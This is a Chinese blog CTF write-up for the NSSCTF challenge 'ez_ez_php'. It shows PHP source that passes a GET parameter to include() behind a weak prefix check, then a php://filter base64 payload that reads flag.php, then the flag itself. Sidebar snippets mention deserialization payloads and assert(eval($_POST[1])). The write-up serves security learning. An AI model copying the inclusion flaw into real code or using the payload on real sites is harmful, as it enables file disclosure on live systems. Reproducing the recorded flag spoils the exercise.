[SWPUCTF 2022 新生赛]ez_ez_php

于 2024-09-06 19:20:18 发布
阅读量367 收藏 5
点赞数 7
分类专栏: CTF比赛WP 文章标签: php 网络安全 笔记 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73049307/article/details/141967453
版权

开启NSSCTF靶场,打开链接:

直接看到源码:

<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 3) === "php" ) {
        echo "Nice!!!";
        include($_GET["file"]);
    } 

    else {
        echo "Hacker!!";
    }
}else {
    highlight_file(__FILE__);
}
//flag.php

尝试用php伪协议构造payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

去base64在线解密网站中解密:

php伪协议的思路是正确的,只不过是构造payload出错了,再仔细代码审计一下:

substr($_GET["file"], 0, 3) === "php"

这行代码检查通过GET请求传递的参数file的前三个字符是否等于"php",是的话就执行

echo "Nice!!!";

include($_GET["file"]);

再看一下构造的payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

呃,没什么问题啊

(注意:这里我反应过来直接是flag就可以了,不用flag.php)

得到flag:

NSSCTF{193c4917-43e8-41d4-8f55-015b2c9aba51}

南暮思鸢
关注
专栏目录
[UUCTF 2022 新生]ez_rce(1),2024年大厂网络安全面经
m0_61549953的博客
04-06 921
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(REVERSE篇)
jameshuangchuan的博客
08-10 2688
str.zfill(width)根据width长度对str进行切片,那么此题中的注释可以看出,result。真的麻,年轻时没有好好学习,后果就是一把年纪重新捡起这些玩意看到程序就头皮发麻……hex()用于将10进制整数转换成16进制,以字符串形式表示。ord()用来返回对应字符的ascii码。此处主要在NSSCTF平台(
php伪协议 [SWPUCTF 2022 新生]ez_ez_php(revenge)
最新发布
m0_75178803的博客
02-26 1024
打开题目题目源代码如下代码审计一下首先检查是否存在名为file的 GET 参数如果存在file参数,就用substr函数检查该参数值的前三个字符是否为 "php"includefile很明显。
【SWPU NSS新生校外通道】web:奇妙的MD5、whereami、webdog1__start、ez_ez_phpez_ez_php(revenge)
weixin_46497491的博客
10-23 1274
【SWPU NSS新生校外通道】web:奇妙的MD5、whereami、webdog1__start、ez_ez_phpez_ez_php(revenge)
php upload ctf,强网杯CTF防御ez_upload Writeup
weixin_35645813的博客
03-17 1172
这是强网杯拟态防御线下遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家。ez_upload这题算是非常经典的堆叠black trick的题目,算是比较典型的ctf式题目(虽然现在大家都很抵制这样的题目),这里主要是分享Writeup以及我们队在完成题目时的思考流程。ez_upload 思考流程最开始我先描述一下题目逻辑。1、login.php,登陆页面,...
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(CRYPTO篇)
jameshuangchuan的博客
08-28 1094
刚经过reverse的折磨又来?分析可得原文经过了三层加密,按顺序分别是base64、base32、base16,那倒序逐层解密就完事了。看着像是MD5加密过的。字符串复制粘贴到在线MD5解密工具上跑吧。第一次提交flag把牵前面的b'带上了,报错,去掉之后就对了。刚好前段时间刷到到过一篇文章讲猪圈密码的,直接对着看就行。碰到UUEncode解密的时候出现了flag。感觉没看出来啥规律,只好拿出工具无脑碰运气。此处主要在NSSCTF平台(……得到flag是md5yyds。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(WEB篇)
jameshuangchuan的博客
08-08 2992
此处主要在NSSCTF平台()上开展刷题。
SWPUCTF 2022 新生-WEB部分wp
m0_74606212的博客
09-24 712
SWPUCTF 2022 新生-WEB部分wp
[BJDCTF 2020] EzPHP
weixin_51804748的博客
11-15 4713
前言 最近经常见到BJDCTF题的改版,其中有一道很经典的代码审计题目,写篇博客学习一下 https://github.com/BjdsecCA/BJDCTF2020 Part 1 (主页) 打开题目之后是一个网页,并没有和解题有关的信息 查看源代码后发现注释信息中有提示GFXEIM3YFZYGQ4A=,用base解码后得到信息1nD3x.php 访问/1nD3x.php得到源码 <?php highlight_file(__FILE__); error_reporting(0);
[SWPUCTF 2022 新生]部分web
2301_80470992的博客
02-13 1016
分析题目这段 PHP 代码定义了一个名为lyh的类,并在其中定义了一些属性和方法。然后,它使用函数来反序列化从 POST 请求中接收到的数据,并最后使用函数高亮显示当前文件的源代码。类定义 (lyh$url$lt$lly$this->lt$a$a$this->lly代码执行流程lyh__destruct$lt$lly这个题目是一题很标准的反序列化构造链条得到以下payload=O:3:"lyh":3:{s:3:"url";s:2:"lt";s:3:"lly";s:2:"ls";
[FSCTF 2023]ez_php2 WP
SmillPig的博客
12-17 339
传参请求,拿到flag。
2022 SWPU新生&HNCTF web部分题目
weixin_63231007的博客
11-02 3573
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php
[FSCTF 2023]ez_php1已解决
XXokok的博客
10-24 713
[FSCTF 2023]ez_php1已解决
TryHackMe-Debug(ez php反序列化)
M1n9K1n9的博客
03-06 435
Linux机器CTF!您将了解枚举,查找隐藏的密码文件以及如何利用php反序列化!
20220207-CTF-MISC-第11题--- base64隐写--附带脚本
qq_51550750的博客
02-07 9662
攻防世界- MISC新手区–第11题–base64隐写 下载之后解压,是stego.txt 打开stego.txt 显然是base64编码之后的结果,base64解码,我还百度翻译了一下,也没什么发现。 于是想办法,因为没有MISC的基础,就去看了WP,知道是base64隐写。于是查阅资料了解了一下。 base64隐写的原理 (1)起因: 俄罗斯有个叫 Olympic_ctf 的 CTF, 在 2014 年有道 misc 题是关于 Base64 的隐写题. 大意就是给了你一段字符串, 让你找 fla
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值